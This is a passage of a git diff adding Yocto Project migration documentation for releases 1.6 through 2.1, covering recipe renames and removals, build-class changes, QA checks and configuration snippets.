+Preprocess and Post Process Command Variable Behavior
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+The following variables now expect a semicolon separated list of
+functions to call and not arbitrary shell commands:
+
+  - :term:`ROOTFS_PREPROCESS_COMMAND`
+  - :term:`ROOTFS_POSTPROCESS_COMMAND`
+  - :term:`SDK_POSTPROCESS_COMMAND`
+  - :term:`POPULATE_SDK_POST_TARGET_COMMAND`
+  - :term:`POPULATE_SDK_POST_HOST_COMMAND`
+  - :term:`IMAGE_POSTPROCESS_COMMAND`
+  - :term:`IMAGE_PREPROCESS_COMMAND`
+  - :term:`ROOTFS_POSTUNINSTALL_COMMAND`
+  - :term:`ROOTFS_POSTINSTALL_COMMAND`
+
+For
+migration purposes, you can simply wrap shell commands in a shell
+function and then call the function. Here is an example: ::
+
+   my_postprocess_function() {
+      echo "hello" > ${IMAGE_ROOTFS}/hello.txt
+   }
+   ROOTFS_POSTPROCESS_COMMAND += "my_postprocess_function; "
+
+.. _migration-1.6-package-test-ptest:
+
+Package Test (ptest)
+--------------------
+
+Package Tests (ptest) are built but not installed by default. For
+information on using Package Tests, see the
+":ref:`dev-manual/dev-manual-common-tasks:testing packages with ptest`"
+section in the Yocto Project Development Tasks Manual. For information on the
+``ptest`` class, see the ":ref:`ptest.bbclass <ref-classes-ptest>`"
+section.
+
+.. _migration-1.6-build-changes:
+
+Build Changes
+-------------
+
+Separate build and source directories have been enabled by default for
+selected recipes where it is known to work (a whitelist) and for all
+recipes that inherit the :ref:`cmake <ref-classes-cmake>` class. In
+future releases the :ref:`autotools <ref-classes-autotools>` class
+will enable a separate build directory by default as well. Recipes
+building Autotools-based software that fails to build with a separate
+build directory should be changed to inherit from the
+:ref:`autotools-brokensep <ref-classes-autotools>` class instead of
+the ``autotools`` or ``autotools_stage``\ classes.
+
+.. _migration-1.6-building-qemu-native:
+
+``qemu-native``
+---------------
+
+``qemu-native`` now builds without SDL-based graphical output support by
+default. The following additional lines are needed in your
+``local.conf`` to enable it:
+::
+
+   PACKAGECONFIG_pn-qemu-native = "sdl"
+   ASSUME_PROVIDED += "libsdl-native"
+
+.. note::
+
+   The default ``local.conf`` contains these statements. Consequently, if you
+   are building a headless system and using a default ``local.conf``
+   file, you will need comment these two lines out.
+
+.. _migration-1.6-core-image-basic:
+
+``core-image-basic``
+--------------------
+
+``core-image-basic`` has been renamed to ``core-image-full-cmdline``.
+
+In addition to ``core-image-basic`` being renamed,
+``packagegroup-core-basic`` has been renamed to
+``packagegroup-core-full-cmdline`` to match.
+
+.. _migration-1.6-licensing:
+
+Licensing
+---------
+
+The top-level ``LICENSE`` file has been changed to better describe the
+license of the various components of :term:`OpenEmbedded-Core (OE-Core)`. However,
+the licensing itself remains unchanged.
+
+Normally, this change would not cause any side-effects. However, some
+recipes point to this file within
+:term:`LIC_FILES_CHKSUM` (as
+``${COREBASE}/LICENSE``) and thus the accompanying checksum must be
+changed from 3f40d7994397109285ec7b81fdeb3b58 to
+4d92cd373abda3937c2bc47fbc49d690. A better alternative is to have
+``LIC_FILES_CHKSUM`` point to a file describing the license that is
+distributed with the source that the recipe is building, if possible,
+rather than pointing to ``${COREBASE}/LICENSE``.
+
+.. _migration-1.6-cflags-options:
+
+``CFLAGS`` Options
+------------------
+
+The "-fpermissive" option has been removed from the default
+:term:`CFLAGS` value. You need to take action on
+individual recipes that fail when building with this option. You need to
+either patch the recipes to fix the issues reported by the compiler, or
+you need to add "-fpermissive" to ``CFLAGS`` in the recipes.
+
+.. _migration-1.6-custom-images:
+
+Custom Image Output Types
+-------------------------
+
+Custom image output types, as selected using
+:term:`IMAGE_FSTYPES`, must declare their
+dependencies on other image types (if any) using a new
+:term:`IMAGE_TYPEDEP` variable.
+
+.. _migration-1.6-do-package-write-task:
+
+Tasks
+-----
+
+The ``do_package_write`` task has been removed. The task is no longer
+needed.
+
+.. _migration-1.6-update-alternatives-provider:
+
+``update-alternative`` Provider
+-------------------------------
+
+The default ``update-alternatives`` provider has been changed from
+``opkg`` to ``opkg-utils``. This change resolves some troublesome
+circular dependencies. The runtime package has also been renamed from
+``update-alternatives-cworth`` to ``update-alternatives-opkg``.
+
+.. _migration-1.6-virtclass-overrides:
+
+``virtclass`` Overrides
+-----------------------
+
+The ``virtclass`` overrides are now deprecated. Use the equivalent class
+overrides instead (e.g. ``virtclass-native`` becomes ``class-native``.)
+
+.. _migration-1.6-removed-renamed-recipes:
+
+Removed and Renamed Recipes
+---------------------------
+
+The following recipes have been removed:
+
+-  ``packagegroup-toolset-native`` - This recipe is largely unused.
+
+-  ``linux-yocto-3.8`` - Support for the Linux yocto 3.8 kernel has been
+   dropped. Support for the 3.10 and 3.14 kernels have been added with
+   the ``linux-yocto-3.10`` and ``linux-yocto-3.14`` recipes.
+
+-  ``ocf-linux`` - This recipe has been functionally replaced using
+   ``cryptodev-linux``.
+
+-  ``genext2fs`` - ``genext2fs`` is no longer used by the build system
+   and is unmaintained upstream.
+
+-  ``js`` - This provided an ancient version of Mozilla's javascript
+   engine that is no longer needed.
+
+-  ``zaurusd`` - The recipe has been moved to the ``meta-handheld``
+   layer.
+
+-  ``eglibc 2.17`` - Replaced by the ``eglibc 2.19`` recipe.
+
+-  ``gcc 4.7.2`` - Replaced by the now stable ``gcc 4.8.2``.
+
+-  ``external-sourcery-toolchain`` - this recipe is now maintained in
+   the ``meta-sourcery`` layer.
+
+-  ``linux-libc-headers-yocto 3.4+git`` - Now using version 3.10 of the
+   ``linux-libc-headers`` by default.
+
+-  ``meta-toolchain-gmae`` - This recipe is obsolete.
+
+-  ``packagegroup-core-sdk-gmae`` - This recipe is obsolete.
+
+-  ``packagegroup-core-standalone-gmae-sdk-target`` - This recipe is
+   obsolete.
+
+.. _migration-1.6-removed-classes:
+
+Removed Classes
+---------------
+
+The following classes have become obsolete and have been removed:
+
+-  ``module_strip``
+
+-  ``pkg_metainfo``
+
+-  ``pkg_distribute``
+
+-  ``image-empty``
+
+.. _migration-1.6-reference-bsps:
+
+Reference Board Support Packages (BSPs)
+---------------------------------------
+
+The following reference BSPs changes occurred:
+
+-  The BeagleBoard (``beagleboard``) ARM reference hardware has been
+   replaced by the BeagleBone (``beaglebone``) hardware.
+
+-  The RouterStation Pro (``routerstationpro``) MIPS reference hardware
+   has been replaced by the EdgeRouter Lite (``edgerouter``) hardware.
+
+The previous reference BSPs for the ``beagleboard`` and
+``routerstationpro`` machines are still available in a new
+``meta-yocto-bsp-old`` layer in the
+:yocto_git:`Source Repositories <>` at
+:yocto_git:`/cgit/cgit.cgi/meta-yocto-bsp-old/`.
+
+
diff --git a/documentation/ref-manual/migration-1.7.rst b/documentation/ref-manual/migration-1.7.rst
new file mode 100644
index 0000000000..5a5151ec1c
--- /dev/null
+++ b/documentation/ref-manual/migration-1.7.rst
@@ -0,0 +1,223 @@
+Moving to the Yocto Project 1.7 Release
+=======================================
+
+This section provides migration information for moving to the Yocto
+Project 1.7 Release from the prior release.
+
+.. _migration-1.7-changes-to-setting-qemu-packageconfig-options:
+
+Changes to Setting QEMU ``PACKAGECONFIG`` Options in ``local.conf``
+-------------------------------------------------------------------
+
+The QEMU recipe now uses a number of
+:term:`PACKAGECONFIG` options to enable various
+optional features. The method used to set defaults for these options
+means that existing ``local.conf`` files will need to be be modified to
+append to ``PACKAGECONFIG`` for ``qemu-native`` and ``nativesdk-qemu``
+instead of setting it. In other words, to enable graphical output for
+QEMU, you should now have these lines in ``local.conf``:
+::
+
+   PACKAGECONFIG_append_pn-qemu-native = " sdl"
+   PACKAGECONFIG_append_pn-nativesdk-qemu = " sdl"
+
+.. _migration-1.7-minimum-git-version:
+
+Minimum Git version
+-------------------
+
+The minimum :ref:`overview-manual/overview-manual-development-environment:git`
+version required on the
+build host is now 1.7.8 because the ``--list`` option is now required by
+BitBake's Git fetcher. As always, if your host distribution does not
+provide a version of Git that meets this requirement, you can use the
+``buildtools-tarball`` that does. See the
+":ref:`ref-manual/ref-system-requirements:required git, tar, python and gcc versions`"
+section for more information.
+
+.. _migration-1.7-autotools-class-changes:
+
+Autotools Class Changes
+-----------------------
+
+The following :ref:`autotools <ref-classes-autotools>` class changes
+occurred:
+
+-  *A separate build directory is now used by default:* The
+   ``autotools`` class has been changed to use a directory for building
+   (:term:`B`), which is separate from the source directory
+   (:term:`S`). This is commonly referred to as ``B != S``, or
+   an out-of-tree build.
+
+   If the software being built is already capable of building in a
+   directory separate from the source, you do not need to do anything.
+   However, if the software is not capable of being built in this
+   manner, you will need to either patch the software so that it can
+   build separately, or you will need to change the recipe to inherit
+   the :ref:`autotools-brokensep <ref-classes-autotools>` class
+   instead of the ``autotools`` or ``autotools_stage`` classes.
+
+-  The ``--foreign`` option is no longer passed to ``automake`` when
+   running ``autoconf``: This option tells ``automake`` that a
+   particular software package does not follow the GNU standards and
+   therefore should not be expected to distribute certain files such as
+   ``ChangeLog``, ``AUTHORS``, and so forth. Because the majority of
+   upstream software packages already tell ``automake`` to enable
+   foreign mode themselves, the option is mostly superfluous. However,
+   some recipes will need patches for this change. You can easily make
+   the change by patching ``configure.ac`` so that it passes "foreign"
+   to ``AM_INIT_AUTOMAKE()``. See `this
+   commit <http://cgit.openembedded.org/openembedded-core/commit/?id=01943188f85ce6411717fb5bf702d609f55813f2>`__
+   for an example showing how to make the patch.
+
+.. _migration-1.7-binary-configuration-scripts-disabled:
+
+Binary Configuration Scripts Disabled
+-------------------------------------
+
+Some of the core recipes that package binary configuration scripts now
+disable the scripts due to the scripts previously requiring error-prone
+path substitution. Software that links against these libraries using
+these scripts should use the much more robust ``pkg-config`` instead.
+The list of recipes changed in this version (and their configuration
+scripts) is as follows:
+::
+
+   directfb (directfb-config)
+   freetype (freetype-config)
+   gpgme (gpgme-config)
+   libassuan (libassuan-config)
+   libcroco (croco-6.0-config)
+   libgcrypt (libgcrypt-config)
+   libgpg-error (gpg-error-config)
+   libksba (ksba-config)
+   libpcap (pcap-config)
+   libpcre (pcre-config)
+   libpng (libpng-config, libpng16-config)
+   libsdl (sdl-config)
+   libusb-compat (libusb-config)
+   libxml2 (xml2-config)
+   libxslt (xslt-config)
+   ncurses (ncurses-config)
+   neon (neon-config)
+   npth (npth-config)
+   pth (pth-config)
+   taglib (taglib-config)
+
+Additionally, support for ``pkg-config`` has been added to some recipes in the
+previous list in the rare cases where the upstream software package does
+not already provide it.
+
+.. _migration-1.7-glibc-replaces-eglibc:
+
+``eglibc 2.19`` Replaced with ``glibc 2.20``
+--------------------------------------------
+
+Because ``eglibc`` and ``glibc`` were already fairly close, this
+replacement should not require any significant changes to other software
+that links to ``eglibc``. However, there were a number of minor changes
+in ``glibc 2.20`` upstream that could require patching some software
+(e.g. the removal of the ``_BSD_SOURCE`` feature test macro).
+
+``glibc 2.20`` requires version 2.6.32 or greater of the Linux kernel.
+Thus, older kernels will no longer be usable in conjunction with it.
+
+For full details on the changes in ``glibc 2.20``, see the upstream
+release notes
+`here <https://sourceware.org/ml/libc-alpha/2014-09/msg00088.html>`__.
+
+.. _migration-1.7-kernel-module-autoloading:
+
+Kernel Module Autoloading
+-------------------------
+
+The :term:`module_autoload_* <module_autoload>` variable is now
+deprecated and a new
+:term:`KERNEL_MODULE_AUTOLOAD` variable
+should be used instead. Also, :term:`module_conf_* <module_conf>`
+must now be used in conjunction with a new
+:term:`KERNEL_MODULE_PROBECONF` variable.
+The new variables no longer require you to specify the module name as
+part of the variable name. This change not only simplifies usage but
+also allows the values of these variables to be appropriately
+incorporated into task signatures and thus trigger the appropriate tasks
+to re-execute when changed. You should replace any references to
+``module_autoload_*`` with ``KERNEL_MODULE_AUTOLOAD``, and add any
+modules for which ``module_conf_*`` is specified to
+``KERNEL_MODULE_PROBECONF``.
+
+.. _migration-1.7-qa-check-changes:
+
+QA Check Changes
+----------------
+
+The following changes have occurred to the QA check process:
+
+-  Additional QA checks ``file-rdeps`` and ``build-deps`` have been
+   added in order to verify that file dependencies are satisfied (e.g.
+   package contains a script requiring ``/bin/bash``) and build-time
+   dependencies are declared, respectively. For more information, please
+   see the ":doc:`ref-qa-checks`" chapter.
+
+-  Package QA checks are now performed during a new
+   :ref:`ref-tasks-package_qa` task rather than being
+   part of the :ref:`ref-tasks-package` task. This allows
+   more parallel execution. This change is unlikely to be an issue
+   except for highly customized recipes that disable packaging tasks
+   themselves by marking them as ``noexec``. For those packages, you
+   will need to disable the ``do_package_qa`` task as well.
+
+-  Files being overwritten during the
+   :ref:`ref-tasks-populate_sysroot` task now
+   trigger an error instead of a warning. Recipes should not be
+   overwriting files written to the sysroot by other recipes. If you
+   have these types of recipes, you need to alter them so that they do
+   not overwrite these files.
+
+   You might now receive this error after changes in configuration or
+   metadata resulting in orphaned files being left in the sysroot. If
+   you do receive this error, the way to resolve the issue is to delete
+   your :term:`TMPDIR` or to move it out of the way and
+   then re-start the build. Anything that has been fully built up to
+   that point and does not need rebuilding will be restored from the
+   shared state cache and the rest of the build will be able to proceed
+   as normal.
+
+.. _migration-1.7-removed-recipes:
+
+Removed Recipes
+---------------
+
+The following recipes have been removed:
+
+-  ``x-load``: This recipe has been superseded by U-boot SPL for all
+   Cortex-based TI SoCs. For legacy boards, the ``meta-ti`` layer, which
+   contains a maintained recipe, should be used instead.
+
+-  ``ubootchart``: This recipe is obsolete. A ``bootchart2`` recipe has
+   been added to functionally replace it.
+
+-  ``linux-yocto 3.4``: Support for the linux-yocto 3.4 kernel has been
+   dropped. Support for the 3.10 and 3.14 kernels remains, while support
+   for version 3.17 has been added.
+
+-  ``eglibc`` has been removed in favor of ``glibc``. See the
+   ":ref:`migration-1.7-glibc-replaces-eglibc`" section for more information.
+
+.. _migration-1.7-miscellaneous-changes:
+
+Miscellaneous Changes
+---------------------
+
+The following miscellaneous change occurred:
+
+-  The build history feature now writes ``build-id.txt`` instead of
+   ``build-id``. Additionally, ``build-id.txt`` now contains the full
+   build header as printed by BitBake upon starting the build. You
+   should manually remove old "build-id" files from your existing build
+   history repositories to avoid confusion. For information on the build
+   history feature, see the
+   ":ref:`dev-manual/dev-manual-common-tasks:maintaining build output quality`"
+   section in the Yocto Project Development Tasks Manual.
+
+
diff --git a/documentation/ref-manual/migration-1.8.rst b/documentation/ref-manual/migration-1.8.rst
new file mode 100644
index 0000000000..d601e6b63b
--- /dev/null
+++ b/documentation/ref-manual/migration-1.8.rst
@@ -0,0 +1,183 @@
+Moving to the Yocto Project 1.8 Release
+=======================================
+
+This section provides migration information for moving to the Yocto
+Project 1.8 Release from the prior release.
+
+.. _migration-1.8-removed-recipes:
+
+Removed Recipes
+---------------
+
+The following recipes have been removed:
+
+-  ``owl-video``: Functionality replaced by ``gst-player``.
+
+-  ``gaku``: Functionality replaced by ``gst-player``.
+
+-  ``gnome-desktop``: This recipe is now available in ``meta-gnome`` and
+   is no longer needed.
+
+-  ``gsettings-desktop-schemas``: This recipe is now available in
+   ``meta-gnome`` and is no longer needed.
+
+-  ``python-argparse``: The ``argparse`` module is already provided in
+   the default Python distribution in a package named
+   ``python-argparse``. Consequently, the separate ``python-argparse``
+   recipe is no longer needed.
+
+-  ``telepathy-python, libtelepathy, telepathy-glib, telepathy-idle, telepathy-mission-control``:
+   All these recipes have moved to ``meta-oe`` and are consequently no
+   longer needed by any recipes in OpenEmbedded-Core.
+
+-  ``linux-yocto_3.10`` and ``linux-yocto_3.17``: Support for the
+   linux-yocto 3.10 and 3.17 kernels has been dropped. Support for the
+   3.14 kernel remains, while support for 3.19 kernel has been added.
+
+-  ``poky-feed-config-opkg``: This recipe has become obsolete and is no
+   longer needed. Use ``distro-feed-config`` from ``meta-oe`` instead.
+
+-  ``libav 0.8.x``: ``libav 9.x`` is now used.
+
+-  ``sed-native``: No longer needed. A working version of ``sed`` is
+   expected to be provided by the host distribution.
+
+.. _migration-1.8-bluez:
+
+BlueZ 4.x / 5.x Selection
+-------------------------
+
+Proper built-in support for selecting BlueZ 5.x in preference to the
+default of 4.x now exists. To use BlueZ 5.x, simply add "bluez5" to your
+:term:`DISTRO_FEATURES` value. If you had
+previously added append files (``*.bbappend``) to make this selection,
+you can now remove them.
+
+Additionally, a ``bluetooth`` class has been added to make selection of
+the appropriate bluetooth support within a recipe a little easier. If
+you wish to make use of this class in a recipe, add something such as
+the following: ::
+
+   inherit bluetooth
+   PACKAGECONFIG ??= "${@bb.utils.contains('DISTRO_FEATURES', 'bluetooth', '${BLUEZ}', '', d)}"
+   PACKAGECONFIG[bluez4] = "--enable-bluetooth,--disable-bluetooth,bluez4"
+   PACKAGECONFIG[bluez5] = "--enable-bluez5,--disable-bluez5,bluez5"
+
+.. _migration-1.8-kernel-build-changes:
+
+Kernel Build Changes
+--------------------
+
+The kernel build process was changed to place the source in a common
+shared work area and to place build artifacts separately in the source
+code tree. In theory, migration paths have been provided for most common
+usages in kernel recipes but this might not work in all cases. In
+particular, users need to ensure that ``${S}`` (source files) and
+``${B}`` (build artifacts) are used correctly in functions such as
+:ref:`ref-tasks-configure` and
+:ref:`ref-tasks-install`. For kernel recipes that do not
+inherit from ``kernel-yocto`` or include ``linux-yocto.inc``, you might
+wish to refer to the ``linux.inc`` file in the ``meta-oe`` layer for the
+kinds of changes you need to make. For reference, here is the
+`commit <http://cgit.openembedded.org/meta-openembedded/commit/meta-oe/recipes-kernel/linux/linux.inc?id=fc7132ede27ac67669448d3d2845ce7d46c6a1ee>`__
+where the ``linux.inc`` file in ``meta-oe`` was updated.
+
+Recipes that rely on the kernel source code and do not inherit the
+module classes might need to add explicit dependencies on the
+``do_shared_workdir`` kernel task, for example: ::
+
+   do_configure[depends] += "virtual/kernel:do_shared_workdir"
+
+.. _migration-1.8-ssl:
+
+SSL 3.0 is Now Disabled in OpenSSL
+----------------------------------
+
+SSL 3.0 is now disabled when building OpenSSL. Disabling SSL 3.0 avoids
+any lingering instances of the POODLE vulnerability. If you feel you
+must re-enable SSL 3.0, then you can add an append file (``*.bbappend``)
+for the ``openssl`` recipe to remove "-no-ssl3" from
+:term:`EXTRA_OECONF`.
+
+.. _migration-1.8-default-sysroot-poisoning:
+
+Default Sysroot Poisoning
+-------------------------
+
+``gcc's`` default sysroot and include directories are now "poisoned". In
+other words, the sysroot and include directories are being redirected to
+a non-existent location in order to catch when host directories are
+being used due to the correct options not being passed. This poisoning
+applies both to the cross-compiler used within the build and to the
+cross-compiler produced in the SDK.
+
+If this change causes something in the build to fail, it almost
+certainly means the various compiler flags and commands are not being
+passed correctly to the underlying piece of software. In such cases, you
+need to take corrective steps.
+
+.. _migration-1.8-rebuild-improvements:
+
+Rebuild Improvements
+--------------------
+
+Changes have been made to the :ref:`base <ref-classes-base>`,
+:ref:`autotools <ref-classes-autotools>`, and
+:ref:`cmake <ref-classes-cmake>` classes to clean out generated files
+when the :ref:`ref-tasks-configure` task needs to be
+re-executed.
+
+One of the improvements is to attempt to run "make clean" during the
+``do_configure`` task if a ``Makefile`` exists. Some software packages
+do not provide a working clean target within their make files. If you
+have such recipes, you need to set
+:term:`CLEANBROKEN` to "1" within the recipe, for example: ::
+
+   CLEANBROKEN = "1"
+
+.. _migration-1.8-qa-check-and-validation-changes:
+
+QA Check and Validation Changes
+-------------------------------
+
+The following QA Check and Validation Changes have occurred:
+
+-  Usage of ``PRINC`` previously triggered a warning. It now triggers an
+   error. You should remove any remaining usage of ``PRINC`` in any
+   recipe or append file.
+
+-  An additional QA check has been added to detect usage of ``${D}`` in
+   :term:`FILES` values where :term:`D` values
+   should not be used at all. The same check ensures that ``$D`` is used
+   in ``pkg_preinst/pkg_postinst/pkg_prerm/pkg_postrm`` functions
+   instead of ``${D}``.
+
+-  :term:`S` now needs to be set to a valid value within a
+   recipe. If ``S`` is not set in the recipe, the directory is not
+   automatically created. If ``S`` does not point to a directory that
+   exists at the time the :ref:`ref-tasks-unpack` task
+   finishes, a warning will be shown.
+
+-  :term:`LICENSE` is now validated for correct
+   formatting of multiple licenses. If the format is invalid (e.g.
+   multiple licenses are specified with no operators to specify how the
+   multiple licenses interact), then a warning will be shown.
+
+.. _migration-1.8-miscellaneous-changes:
+
+Miscellaneous Changes
+---------------------
+
+The following miscellaneous changes have occurred:
+
+-  The ``send-error-report`` script now expects a "-s" option to be
+   specified before the server address. This assumes a server address is
+   being specified.
+
+-  The ``oe-pkgdata-util`` script now expects a "-p" option to be
+   specified before the ``pkgdata`` directory, which is now optional. If
+   the ``pkgdata`` directory is not specified, the script will run
+   BitBake to query :term:`PKGDATA_DIR` from the
+   build environment.
+
+
diff --git a/documentation/ref-manual/migration-2.0.rst b/documentation/ref-manual/migration-2.0.rst
new file mode 100644
index 0000000000..4eea94887b
--- /dev/null
+++ b/documentation/ref-manual/migration-2.0.rst
@@ -0,0 +1,281 @@
+Moving to the Yocto Project 2.0 Release
+=======================================
+
+This section provides migration information for moving to the Yocto
+Project 2.0 Release from the prior release.
+
+.. _migration-2.0-gcc-5:
+
+GCC 5
+-----
+
+The default compiler is now GCC 5.2. This change has required fixes for
+compilation errors in a number of other recipes.
+
+One important example is a fix for when the Linux kernel freezes at boot
+time on ARM when built with GCC 5. If you are using your own kernel
+recipe or source tree and building for ARM, you will likely need to
+apply this
+`patch <https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit?id=a077224fd35b2f7fbc93f14cf67074fc792fbac2>`__.
+The standard ``linux-yocto`` kernel source tree already has a workaround
+for the same issue.
+
+For further details, see https://gcc.gnu.org/gcc-5/changes.html
+and the porting guide at
+https://gcc.gnu.org/gcc-5/porting_to.html.
+
+Alternatively, you can switch back to GCC 4.9 or 4.8 by setting
+``GCCVERSION`` in your configuration, as follows:
+::
+
+   GCCVERSION = "4.9%"
+
+.. _migration-2.0-Gstreamer-0.10-removed:
+
+Gstreamer 0.10 Removed
+----------------------
+
+Gstreamer 0.10 has been removed in favor of Gstreamer 1.x. As part of
+the change, recipes for Gstreamer 0.10 and related software are now
+located in ``meta-multimedia``. This change results in Qt4 having Phonon
+and Gstreamer support in QtWebkit disabled by default.
+
+.. _migration-2.0-removed-recipes:
+
+Removed Recipes
+---------------
+
+The following recipes have been moved or removed:
+
+-  ``bluez4``: The recipe is obsolete and has been moved due to
+   ``bluez5`` becoming fully integrated. The ``bluez4`` recipe now
+   resides in ``meta-oe``.
+
+-  ``gamin``: The recipe is obsolete and has been removed.
+
+-  ``gnome-icon-theme``: The recipe's functionally has been replaced by
+   ``adwaita-icon-theme``.
+
+-  Gstreamer 0.10 Recipes: Recipes for Gstreamer 0.10 have been removed
+   in favor of the recipes for Gstreamer 1.x.
+
+-  ``insserv``: The recipe is obsolete and has been removed.
+
+-  ``libunique``: The recipe is no longer used and has been moved to
+   ``meta-oe``.
+
+-  ``midori``: The recipe's functionally has been replaced by
+   ``epiphany``.
+
+-  ``python-gst``: The recipe is obsolete and has been removed since it
+   only contains bindings for Gstreamer 0.10.
+
+-  ``qt-mobility``: The recipe is obsolete and has been removed since it
+   requires ``Gstreamer 0.10``, which has been replaced.
+
+-  ``subversion``: All 1.6.x versions of this recipe have been removed.
+
+-  ``webkit-gtk``: The older 1.8.3 version of this recipe has been
+   removed in favor of ``webkitgtk``.
+
+.. _migration-2.0-bitbake-datastore-improvements:
+
+BitBake datastore improvements
+------------------------------
+
+The method by which BitBake's datastore handles overrides has changed.
+Overrides are now applied dynamically and ``bb.data.update_data()`` is
+now a no-op. Thus, ``bb.data.update_data()`` is no longer required in
+order to apply the correct overrides. In practice, this change is
+unlikely to require any changes to Metadata. However, these minor
+changes in behavior exist:
+
+-  All potential overrides are now visible in the variable history as
+   seen when you run the following:
+   ::
+
+      $ bitbake -e
+
+-  ``d.delVar('VARNAME')`` and
+   ``d.setVar('VARNAME', None)`` result in the variable and all
+   of its overrides being cleared out. Before the change, only the
+   non-overridden values were cleared.
+
+.. _migration-2.0-shell-message-function-changes:
+
+Shell Message Function Changes
+------------------------------
+
+The shell versions of the BitBake message functions (i.e. ``bbdebug``,
+``bbnote``, ``bbwarn``, ``bbplain``, ``bberror``, and ``bbfatal``) are
+now connected through to their BitBake equivalents ``bb.debug()``,
+``bb.note()``, ``bb.warn()``, ``bb.plain()``, ``bb.error()``, and
+``bb.fatal()``, respectively. Thus, those message functions that you
+would expect to be printed by the BitBake UI are now actually printed.
+In practice, this change means two things:
+
+-  If you now see messages on the console that you did not previously
+   see as a result of this change, you might need to clean up the calls
+   to ``bbwarn``, ``bberror``, and so forth. Or, you might want to
+   simply remove the calls.
+
+-  The ``bbfatal`` message function now suppresses the full error log in
+   the UI, which means any calls to ``bbfatal`` where you still wish to
+   see the full error log should be replaced by ``die`` or
+   ``bbfatal_log``.
+
+.. _migration-2.0-extra-development-debug-package-cleanup:
+
+Extra Development/Debug Package Cleanup
+---------------------------------------
+
+The following recipes have had extra ``dev/dbg`` packages removed:
+
+-  ``acl``
+
+-  ``apmd``
+
+-  ``aspell``
+
+-  ``attr``
+
+-  ``augeas``
+
+-  ``bzip2``
+
+-  ``cogl``
+
+-  ``curl``
+
+-  ``elfutils``
+
+-  ``gcc-target``
+
+-  ``libgcc``
+
+-  ``libtool``
+
+-  ``libxmu``
+
+-  ``opkg``
+
+-  ``pciutils``
+
+-  ``rpm``
+
+-  ``sysfsutils``
+
+-  ``tiff``
+
+-  ``xz``
+
+All of the above recipes now conform to the standard packaging scheme
+where a single ``-dev``, ``-dbg``, and ``-staticdev`` package exists per
+recipe.
+
+.. _migration-2.0-recipe-maintenance-tracking-data-moved-to-oe-core:
+
+Recipe Maintenance Tracking Data Moved to OE-Core
+-------------------------------------------------
+
+Maintenance tracking data for recipes that was previously part of
+``meta-yocto`` has been moved to :term:`OpenEmbedded-Core (OE-Core)`. The change
+includes ``package_regex.inc`` and ``distro_alias.inc``, which are
+typically enabled when using the ``distrodata`` class. Additionally, the
+contents of ``upstream_tracking.inc`` has now been split out to the
+relevant recipes.
+
+.. _migration-2.0-automatic-stale-sysroot-file-cleanup:
+
+Automatic Stale Sysroot File Cleanup
+------------------------------------
+
+Stale files from recipes that no longer exist in the current
+configuration are now automatically removed from sysroot as well as
+removed from any other place managed by shared state. This automatic
+cleanup means that the build system now properly handles situations such
+as renaming the build system side of recipes, removal of layers from
+``bblayers.conf``, and :term:`DISTRO_FEATURES`
+changes.
+
+Additionally, work directories for old versions of recipes are now
+pruned. If you wish to disable pruning old work directories, you can set
+the following variable in your configuration:
+::
+
+   SSTATE_PRUNE_OBSOLETEWORKDIR = "0"
+
+.. _migration-2.0-linux-yocto-kernel-metadata-repository-now-split-from-source:
+
+``linux-yocto`` Kernel Metadata Repository Now Split from Source
+----------------------------------------------------------------
+
+The ``linux-yocto`` tree has up to now been a combined set of kernel
+changes and configuration (meta) data carried in a single tree. While
+this format is effective at keeping kernel configuration and source
+modifications synchronized, it is not always obvious to developers how
+to manipulate the Metadata as compared to the source.
+
+Metadata processing has now been removed from the
+:ref:`kernel-yocto <ref-classes-kernel-yocto>` class and the external
+Metadata repository ``yocto-kernel-cache``, which has always been used
+to seed the ``linux-yocto`` "meta" branch. This separate ``linux-yocto``
+cache repository is now the primary location for this data. Due to this
+change, ``linux-yocto`` is no longer able to process combined trees.
+Thus, if you need to have your own combined kernel repository, you must
+do the split there as well and update your recipes accordingly. See the
+``meta/recipes-kernel/linux/linux-yocto_4.1.bb`` recipe for an example.
+
+.. _migration-2.0-additional-qa-checks:
+
+Additional QA checks
+--------------------
+
+The following QA checks have been added:
+
+-  Added a "host-user-contaminated" check for ownership issues for
+   packaged files outside of ``/home``. The check looks for files that
+   are incorrectly owned by the user that ran BitBake instead of owned
+   by a valid user in the target system.
+
+-  Added an "invalid-chars" check for invalid (non-UTF8) characters in
+   recipe metadata variable values (i.e.
+   :term:`DESCRIPTION`,
+   :term:`SUMMARY`, :term:`LICENSE`, and
+   :term:`SECTION`). Some package managers do not support
+   these characters.
+
+-  Added an "invalid-packageconfig" check for any options specified in
+   :term:`PACKAGECONFIG` that do not match any
+   ``PACKAGECONFIG`` option defined for the recipe.
+
+.. _migration-2.0-miscellaneous:
+
+Miscellaneous Changes
+---------------------
+
+These additional changes exist:
+
+-  ``gtk-update-icon-cache`` has been renamed to ``gtk-icon-utils``.
+
+-  The ``tools-profile`` :term:`IMAGE_FEATURES`
+   item as well as its corresponding packagegroup and
+   ``packagegroup-core-tools-profile`` no longer bring in ``oprofile``.
+   Bringing in ``oprofile`` was originally added to aid compilation on
+   resource-constrained targets. However, this aid has not been widely
+   used and is not likely to be used going forward due to the more
+   powerful target platforms and the existence of better
+   cross-compilation tools.
+
+-  The :term:`IMAGE_FSTYPES` variable's default
+   value now specifies ``ext4`` instead of ``ext3``.
+
+-  All support for the ``PRINC`` variable has been removed.
+
+-  The ``packagegroup-core-full-cmdline`` packagegroup no longer brings
+   in ``lighttpd`` due to the fact that bringing in ``lighttpd`` is not
+   really in line with the packagegroup's purpose, which is to add full
+   versions of command-line tools that by default are provided by
+   ``busybox``.
+
+
diff --git a/documentation/ref-manual/migration-2.1.rst b/documentation/ref-manual/migration-2.1.rst
new file mode 100644
index 0000000000..0220221e01
--- /dev/null
+++ b/documentation/ref-manual/migration-2.1.rst
@@ -0,0 +1,436 @@
+Moving to the Yocto Project 2.1 Release
+=======================================
+
+This section provides migration information for moving to the Yocto
+Project 2.1 Release from the prior release.
+
+.. _migration-2.1-variable-expansion-in-python-functions:
+
+Variable Expansion in Python Functions
+--------------------------------------
+
+Variable expressions, such as ``${VARNAME}`` no longer expand
+automatically within Python functions. Suppressing expansion was done to
+allow Python functions to construct shell scripts or other code for
+situations in which you do not want such expressions expanded. For any
+existing code that relies on these expansions, you need to change the
+expansions to expand the value of individual variables through
+``d.getVar()``. To alternatively expand more complex expressions, use
+``d.expand()``.
+
+.. _migration-2.1-overrides-must-now-be-lower-case:
